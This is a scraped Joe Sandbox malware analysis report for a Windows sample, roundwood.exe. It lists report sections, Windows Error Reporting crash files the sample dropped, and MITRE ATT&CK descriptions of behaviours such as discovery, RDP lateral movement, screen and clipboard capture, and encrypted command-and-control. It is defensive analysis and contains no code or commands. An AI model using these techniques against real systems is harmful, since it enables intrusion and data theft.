Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report roundwood.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oOzTQCDSVNrWDmuG_d5242147ed8425046ac7aa4f5431f81faef10e7_79a3f19c_310b6296-9368-4a8b-a68a-99020108e769\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oOzTQCDSVNrWDmuG_d5242147ed8425046ac7aa4f5431f81faef10e7_79a3f19c_8c845241-7f00-459b-a1f3-afea684e5b50\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oOzTQCDSVNrWDmuG_d5242147ed8425046ac7aa4f5431f81faef10e7_79a3f19c_a62cb88f-4d50-4d56-815a-1be4f90889c4\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oOzTQCDSVNrWDmuG_d5242147ed8425046ac7aa4f5431f81faef10e7_79a3f19c_a7d0f928-ee14-4250-a92c-2d4ce37aecb6\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE33.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF9B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD028.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD058.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD066.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD067.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0C6.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0E4.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD143.tmp.txt

Windows Analysis Report
roundwood.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre